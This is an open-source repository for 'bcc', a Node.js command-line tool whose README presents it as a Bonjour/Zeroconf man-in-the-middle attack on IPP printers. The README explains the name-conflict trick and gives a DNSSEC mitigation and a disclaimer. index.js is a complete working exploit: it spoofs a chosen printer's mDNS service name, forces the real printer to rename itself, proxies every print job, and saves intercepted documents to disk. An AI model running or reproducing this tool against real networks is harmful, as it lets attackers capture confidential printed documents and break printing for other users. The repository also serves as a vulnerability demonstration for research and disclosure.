├── .gitignore ├── .travis.yml ├── LICENSE ├── README.md ├── index.js └── package.json /.gitignore: -------------------------------------------------------------------------------- 1 | node_modules 2 | -------------------------------------------------------------------------------- /.travis.yml: -------------------------------------------------------------------------------- 1 | language: node_js 2 | node_js: 3 | - '4' 4 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | The MIT License (MIT) 2 | 3 | Copyright (c) 2016 Thomas Watson Steen 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 
22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Blind Carbon Copy 2 | 3 | [![Build status](https://travis-ci.org/watson/bcc.svg?branch=master)](https://travis-ci.org/watson/bcc) 4 | [![js-standard-style](https://img.shields.io/badge/code%20style-standard-brightgreen.svg?style=flat)](https://github.com/feross/standard) 5 | 6 | This is an example of a [Bonjour/Zeroconf](http://www.zeroconf.org) 7 | [Man-in-the-Middle 8 | attack](https://en.wikipedia.org/wiki/Man-in-the-middle_attack). This 9 | software showcases the attack of an 10 | [IPP](https://en.wikipedia.org/wiki/Internet_Printing_Protocol) enabled 11 | printer. It will intercept all print jobs sent to the target printer. 12 | 13 | This attack only works for Bonjour/Zeroconf and IPP enabled printers. 14 | Only jobs sent from clients that have the printer configured using 15 | Bonjour/Zeroconf will be intercepted. 16 | 17 | This software uses network connected printers as an example target, but 18 | the vulnerability is an inherent feature of the underlying Multicast DNS 19 | standard ([RFC 6762](http://tools.ietf.org/html/rfc6762)) used by 20 | Bonjour/Zeroconf, so all services relying on this standard may be 21 | affected - not only printers. 22 | 23 | #### Solutions 24 | 25 | Aside from disabling Bonjour/Zeroconf on the printer, one possible way 26 | to secure your network from this sort of attack is by utilizing DNSSEC 27 | ([RFC 4033](http://tools.ietf.org/html/rfc4033)). How to do this is 28 | beyond the scope of this document. 29 | 30 | ## Disclaimer 31 | 32 | Use this software only to test the vulnerability of your own network 33 | printers. 
**Do not use this on networks you do not own without prior 34 | permission.** 35 | 36 | ## Attack Explained 37 | 38 | The attack relies on the fact that Bonjour/Zeroconf uses the Service 39 | Instance Name of a service as the unique key. Clients configured to 40 | connect to a service named `ServiceName` will do so even if the service 41 | changes its host and port. 42 | 43 | The attack works by forcing a name-change on the target service and 44 | updating all clients to connect to a different service controlled by the 45 | attacker: 46 | 47 | 1. An attacker advertises a service on the local network with the same 48 | properties as the target service except for the host and port, which 49 | are replaced with its own 50 | 1. The target service will discover that another service is using its 51 | name and will rename itself to resolve the conflict (usually by 52 | appending a digit to the end of its name: `ServiceName` to 53 | `ServiceName-1`) 54 | 1. Simultaneously all clients on the network who've been configured to 55 | connect to `ServiceName` will now see that the service has changed 56 | host and port and will change their settings to connect to the new 57 | host/port controlled by the attacker 58 | 1. Since all requests to `ServiceName` are now sent to the attacker 59 | instead of the target, it can effectively act as a Man-in-the-Middle 60 | by proxying all requests to the target service 61 | 62 | ## Installation 63 | 64 | This software is written in Node.js and can be installed using the npm 65 | package manager. Ensure that you've [downloaded](https://nodejs.org) and 66 | installed Node.js before continuing. 67 | 68 | Install the `bcc` program globally: 69 | 70 | ``` 71 | npm install bcc -g 72 | ``` 73 | 74 | ## Usage 75 | 76 | Run `bcc` from the command line and select the target from the list of 77 | printers displayed: 78 | 79 | ``` 80 | $ bcc 81 | ? 
Select a printer (use arrow keys) 82 | > HP LaserJet 4600 83 | Reception Color Printer 84 | ``` 85 | 86 | A name-change will now be forced on the selected printer and the `bcc` 87 | program will install itself as a proxy in between clients and the 88 | selected printer. 89 | 90 | When you quit the `bcc` program, no clients configured to connect to the 91 | selected printer will be able to print any more as the proxy is now 92 | offline and the actual printer has changed its name. 93 | 94 | ### Debug mode 95 | 96 | To see all operation headers sent to the printer, start `bcc` with the 97 | `--log=` command line argument: 98 | 99 | ``` 100 | $ bcc --log=bcc.log 101 | ``` 102 | 103 | ## License 104 | 105 | MIT 106 | -------------------------------------------------------------------------------- /index.js: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env node 2 | 'use strict' 3 | 4 | var fs = require('fs') 5 | var util = require('util') 6 | var pump = require('pump') 7 | var menu = require('appendable-cli-menu') 8 | var log = require('single-line-log').stdout 9 | var chalk = require('chalk') 10 | var bonjour = require('bonjour')() 11 | var spy = require('ipp-spy') 12 | var gunzip = require('gunzip-maybe') 13 | var peek = require('peek-stream') 14 | var isPostScript = require('is-postscript') 15 | var isPjl = require('is-pjl') 16 | var isPdf = require('is-pdf') 17 | var C = require('ipp-encoder/constants') 18 | 19 | var logFile = (process.argv[2] || '').split('=') 20 | logFile = logFile[0] === '--log' ? 
logFile[1] : null
// `--log=<path>` is only recognised when it is the first argument (argv[2]);
// anything else leaves logFile null and disables operation logging below.

// Interactive printer picker. Choosing an entry stops the mDNS browse and
// hands the selected service record to hijack().
var printers = menu('Select a printer', function (printer) {
  browser.stop()
  hijack(printer)
})

// Browse the local network for services of type 'ipp' and list each one as
// it is discovered. `printer` is the record emitted by the bonjour module.
var browser = bonjour.find({ type: 'ipp' }, function (printer) {
  printers.add({ name: printer.name, value: printer })
})

// Stand up the proxy for one printer (the name-conflict step the README
// describes under "Attack Explained").
//
// Two things are set up:
//   1. ipp-spy listens on local port 3001 and forwards every IPP operation
//      to the real printer at printer.host:printer.port, invoking the
//      callback once per operation.
//   2. A Bonjour service with the same type/name/txt as the target is
//      published on port 3001 with `probe: false` — presumably this skips the
//      pre-announce name probe so the duplicate name is announced outright,
//      which is what causes the target to rename itself (verify against the
//      bonjour module's documentation).
//
// What this looks like on the wire, for anyone monitoring their network: a
// second 'ipp' announcement carrying an existing printer's name but a
// different host/port, followed by the real printer re-announcing itself
// under a new name. Note the README's caveat that the rename persists after
// this program exits.
//
// @param {Object} printer - service record chosen from the menu; reads
//   .name, .host, .port, .type and .txt.
function hijack (printer) {
  // Display state shared with render(): request counter and the list of
  // captured document file names.
  var state = { printer: printer, ops: 0, docs: [] }
  render(state)

  var opts = {
    port: 3001, // hard-coded listen port; must match the port published below
    forwardHost: printer.host,
    forwardPort: printer.port
  }

  // Runs once per IPP operation that passes through the proxy. `doc` is
  // assumed to be a readable stream of the job body — TODO confirm against
  // ipp-spy; only PRINT_JOB / SEND_DOCUMENT operations are persisted here.
  spy(opts, function (operation, doc) {
    if (logFile) {
      // Append the fully expanded operation (attributes included) to the log
      // path given on the command line. Synchronous, so it blocks the event
      // loop for the duration of the write.
      fs.appendFileSync(logFile,
        '-------------------------------------------\n' +
        util.inspect(operation, { depth: null }) + '\n')
    }

    state.ops++
    render(state)

    if (operation.operationId === C.PRINT_JOB || operation.operationId === C.SEND_DOCUMENT) {
      // Persist the job body into the current working directory. The bytes
      // are whatever the print client sent, inflated by gunzip-maybe if they
      // are gzip-compressed, with no size limit visible here — treat the
      // resulting files as untrusted data.
      var file = toFile('job-' + Date.now())
      pump(doc, gunzip(), file, function (err) {
        // Thrown from an asynchronous callback: nothing up the stack can
        // catch it, so any stream error terminates the whole program.
        if (err) throw err
        // file.name is assigned inside toFile() once the first bytes have
        // been sniffed; presumably set by the time pump() completes — TODO
        // confirm for empty documents.
        state.docs.push(file.name)
        render(state)
      })
    }
  })

  bonjour.publish({ type: printer.type, name: printer.name, port: 3001, txt: printer.txt, probe: false })
}

// Create a write target whose file extension is chosen from the first bytes
// of the document. peek-stream buffers at most 10 bytes (`maxBuffer: 10`),
// runs the content sniffers on them, then swaps in a real fs write stream.
//
// The final file name is exposed as `stream.name`, but only after the peek
// callback has run — i.e. after the first bytes have been written to it.
//
// @param {string} name - base file name (no extension), relative to cwd
// @returns the peek-stream object (writable); opens `<name><ext>` lazily
function toFile (name) {
  var stream = peek({ newline: false, maxBuffer: 10 }, function (data, swap) {
    if (isPostScript(data)) name += '.ps'
    else if (isPjl(data)) name += '-pjl.ps' // Preview.app on OS X will be able to read some PJL documents if opened as .ps
    else if (isPdf(data)) name += '.pdf'
    else name += '.bin'
    stream.name = name
    swap(null, fs.createWriteStream(name))
  })
  return stream
}

// Redraw the status block in place (single-line-log overwrites its previous
// output). The body of this function continues on the next source line.
//
// @param {Object} state - { printer, ops, docs } as maintained by hijack()
function render (state) {
  var len = state.docs.length
  log('Target printer: ' + chalk.yellow(state.printer.name) + chalk.grey(' [' + state.printer.host + ':' + state.printer.port + ']\n') +
    'Requests intercepted: ' + chalk.green(state.ops) + '\n' +
    'Documents printed: ' + chalk.green(len) + '\n' +
    'Latest document: ' + (len ?
chalk.cyan(state.docs[len - 1]) : chalk.grey('waiting...')) + '\n') 82 | } 83 | -------------------------------------------------------------------------------- /package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "bcc", 3 | "version": "1.2.0", 4 | "description": "An IPP tool to Man-in-the-Middle all traffic to a local printer", 5 | "bin": "index.js", 6 | "dependencies": { 7 | "appendable-cli-menu": "^1.1.0", 8 | "bonjour": "^3.2.0", 9 | "chalk": "^1.1.1", 10 | "gunzip-maybe": "^1.3.0", 11 | "ipp-encoder": "^5.0.0", 12 | "ipp-spy": "^1.0.0", 13 | "is-pdf": "^1.0.0", 14 | "is-pjl": "^1.0.0", 15 | "is-postscript": "^1.0.0", 16 | "peek-stream": "^1.1.1", 17 | "pump": "^1.0.1", 18 | "single-line-log": "^1.0.1" 19 | }, 20 | "devDependencies": { 21 | "standard": "^5.4.1" 22 | }, 23 | "scripts": { 24 | "test": "standard" 25 | }, 26 | "repository": { 27 | "type": "git", 28 | "url": "git+https://github.com/watson/bcc.git" 29 | }, 30 | "keywords": [ 31 | "ipp", 32 | "print", 33 | "printer", 34 | "intercept", 35 | "man-in-the-middle", 36 | "MITM", 37 | "MIM", 38 | "MITMA", 39 | "attack", 40 | "dns-sd", 41 | "dnssd", 42 | "bonjour", 43 | "zeroconf" 44 | ], 45 | "author": "Thomas Watson Steen (https://twitter.com/wa7son)", 46 | "license": "MIT", 47 | "bugs": { 48 | "url": "https://github.com/watson/bcc/issues" 49 | }, 50 | "homepage": "https://github.com/watson/bcc#readme", 51 | "preferGlobal": true, 52 | "coordinates": [ 53 | 52.49312219999999, 54 | 13.4230795 55 | ] 56 | } 57 | --------------------------------------------------------------------------------